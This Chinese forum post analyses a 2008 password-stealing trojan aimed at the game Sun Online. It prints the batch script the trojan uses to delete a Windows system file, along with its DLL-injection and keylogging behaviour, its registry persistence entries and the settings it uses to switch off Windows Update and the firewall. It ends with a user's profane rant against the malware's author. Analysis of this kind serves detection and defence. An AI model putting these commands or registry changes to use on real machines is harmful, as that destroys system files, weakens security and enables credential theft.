病毒名称:Tojan-PWS.Win32.OnLineGames.uo(Kaspersky)
病毒别名:Trojan.PSW.Win32.SunOnline.ab(瑞星)
病毒大小:10994 bytes
加壳方式:UPACK, BINARYRES
样本MD5:7f84234d88df5a4ce372b465b4fb825a
样本SHA1:828a7ef284319d145c82003b9935634212c5268b
编写语言:Borland Delphi 6.0-7.0
字串6
行为分析: 字串8
病毒运行后,释放批处理C:\DeleteFileDos.bat,删除正常verclsid.exe系统文件
批处理内容:
@echo off
:Loop
attrib "C:\WINDOWS\SYSTEM32\VERCLSID.EXE" -r -a -s -h
del "C:\WINDOWS\SYSTEM32\VERCLSID.EXE"
if exist "C:\WINDOWS\SYSTEM32\VERCLSID.EXE" goto Loop
del %0
字串4
释放dll文件:
%System32%\Kvsc32.dll
注入系统explorer.exe和winlogon.exe进程,监.视sungames.exe进程(奇迹世界),如发现则记录键盘击键和鼠标操作,以此盗取密码等用户信息 字串3
病毒还会生成 %System32%\kvsc3.ini配置文件,记录病毒版本等信息
字串9
病毒添加以下注册表项,以达到随机启动的目的:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="Kvsc32.dll"
字串2
[HKEY_CLASSES_ROOT\CLSID\\InProcServer32]
@="%System32%\Kvsc32.dll"
字串4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\ShellExecuteHooks]
""="%System32%\Kvsc32.dll"
字串5
病毒修改以下注册表值,禁用系统自动更新功能:
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate]
"Start"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\AUOptions]
"Start"=dword:00000001 字串8
病毒添加以下注册表值,禁用系统防火墙:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall]
"Start"=dword:00000000
字串6
昨天装游戏装到凌晨3点半。我都烦死了。中了毒杀不了,重新安装杀毒软件一直提示这个病毒,游戏装都装不了。垃 圾B勇士G 我册作者全家
[ 此贴被chwenen在2008-11-02 11:05重新编辑 ]
